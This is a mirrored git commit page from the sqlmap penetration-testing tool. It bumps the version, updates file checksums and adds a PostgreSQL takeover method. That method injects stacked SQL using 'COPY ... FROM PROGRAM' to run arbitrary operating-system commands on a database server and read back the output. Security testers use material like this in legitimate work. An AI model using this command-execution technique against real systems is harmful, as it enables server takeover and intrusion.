mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
In preparation for #3545
This commit is contained in:
Miroslav Stampar
parent
14186d3150
commit
ef5cb9a460
|
|
@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.3.3.39"
|
VERSION = "1.3.3.40"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
||||||
|
|
@ -102,3 +102,15 @@ class Takeover(GenericTakeover):
|
||||||
self.createSupportTbl(self.fileTblName, self.tblField, "text")
|
self.createSupportTbl(self.fileTblName, self.tblField, "text")
|
||||||
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
|
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
|
||||||
self.cleanup(onlyFileTbl=True)
|
self.cleanup(onlyFileTbl=True)
|
||||||
|
|
||||||
|
def copyExecCmd(self, cmd):
|
||||||
|
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
|
||||||
|
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
|
||||||
|
self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
|
||||||
|
self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
|
||||||
|
inject.goStacked(self._forgedCmd)
|
||||||
|
|
||||||
|
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
|
||||||
|
output = inject.getValue(query, resumeValue=False)
|
||||||
|
|
||||||
|
return output
|
||||||
|
|
|
||||||
|
|
@ -50,7 +50,7 @@ d5ef43fe3cdd6c2602d7db45651f9ceb lib/core/readlineng.py
|
||||||
7d8a22c582ad201f65b73225e4456170 lib/core/replication.py
|
7d8a22c582ad201f65b73225e4456170 lib/core/replication.py
|
||||||
3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
|
3179d34f371e0295dd4604568fb30bcd lib/core/revision.py
|
||||||
d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
|
d6269c55789f78cf707e09a0f5b45443 lib/core/session.py
|
||||||
e785996e0f9edd8e309094048dc40d05 lib/core/settings.py
|
068159b771eef31a3852da30eba31ccd lib/core/settings.py
|
||||||
4483b4a5b601d8f1c4281071dff21ecc lib/core/shell.py
|
4483b4a5b601d8f1c4281071dff21ecc lib/core/shell.py
|
||||||
10fd19b0716ed261e6d04f311f6f527c lib/core/subprocessng.py
|
10fd19b0716ed261e6d04f311f6f527c lib/core/subprocessng.py
|
||||||
10d7e4f7ba2502cce5cf69223c52eddc lib/core/target.py
|
10d7e4f7ba2502cce5cf69223c52eddc lib/core/target.py
|
||||||
|
|
@ -199,7 +199,7 @@ d68b5a9d6e608f15fbe2c520613ece4a plugins/dbms/postgresql/filesystem.py
|
||||||
a2ac0498d89797041bf65e4990cf8430 plugins/dbms/postgresql/fingerprint.py
|
a2ac0498d89797041bf65e4990cf8430 plugins/dbms/postgresql/fingerprint.py
|
||||||
fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py
|
fb018fd23dcebdb36dddd22ac92efa2c plugins/dbms/postgresql/__init__.py
|
||||||
290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py
|
290ea28e1215565d9d12ede3422a4dcf plugins/dbms/postgresql/syntax.py
|
||||||
339bc65824b5c946ec40a12cd0257df1 plugins/dbms/postgresql/takeover.py
|
cee109ef785cd1ebbc1df5311246094d plugins/dbms/postgresql/takeover.py
|
||||||
014968f7b28abe3ca8e533843a017453 plugins/dbms/sqlite/connector.py
|
014968f7b28abe3ca8e533843a017453 plugins/dbms/sqlite/connector.py
|
||||||
6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py
|
6a0784e3ce46b6aa23dde813c6bc177f plugins/dbms/sqlite/enumeration.py
|
||||||
3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py
|
3c0adec05071fbe655a9c2c7afe52721 plugins/dbms/sqlite/filesystem.py
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user